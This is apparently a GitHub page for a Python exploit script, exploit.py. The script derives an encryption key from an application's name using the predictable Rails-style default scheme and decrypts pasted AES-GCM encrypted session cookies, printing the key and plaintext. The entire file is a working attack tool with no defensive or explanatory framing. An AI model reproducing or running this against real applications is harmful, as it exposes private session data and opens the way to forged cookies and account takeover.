-
Notifications
You must be signed in to change notification settings - Fork 0
/
exploit.py
23 lines (21 loc) · 1.24 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#!/usr/bin/python3
import sys, hashlib, binascii, base64
from backports.pbkdf2 import pbkdf2_hmac
from Crypto.Cipher import AES
def decrypt_gcm(key,data, iv, tag):
cipher = AES.new(binascii.unhexlify(key), AES.MODE_GCM, binascii.unhexlify(iv))
return cipher.decrypt_and_verify(binascii.unhexlify(data), binascii.unhexlify(tag)).decode("utf-8")
if len(sys.argv) < 2:
print("Usage: python3 exploit.py [APPLICATION_NAME]")
else:
print(f"[x] App name: ", sys.argv[1])
md5_name = hashlib.md5((sys.argv[1] + "::Application").encode()).hexdigest()
key = pbkdf2_hmac("sha1", md5_name.encode("utf-8"), "authenticated encrypted cookie".encode("utf-8"), 1000, 32)
token = binascii.hexlify(key).decode("utf-8")
print("[x] Key: ",token)
base64_data = str(input("Base64 Data: "))
data = binascii.hexlify(base64.b64decode(base64_data.split("--")[0])).decode("utf-8")
iv = binascii.hexlify(base64.b64decode(base64_data.split("--")[1])).decode("utf-8")
tag = binascii.hexlify(base64.b64decode(base64_data.split("--")[2])).decode("utf-8")
print(f"-------------------------\n -> [x] Data: {data}\n -> [x] IV: {iv}\n -> [x] Auth Tag: {tag}\n-------------------------")
print("[x] Plaintext Data:", decrypt_gcm(token,data,iv,tag))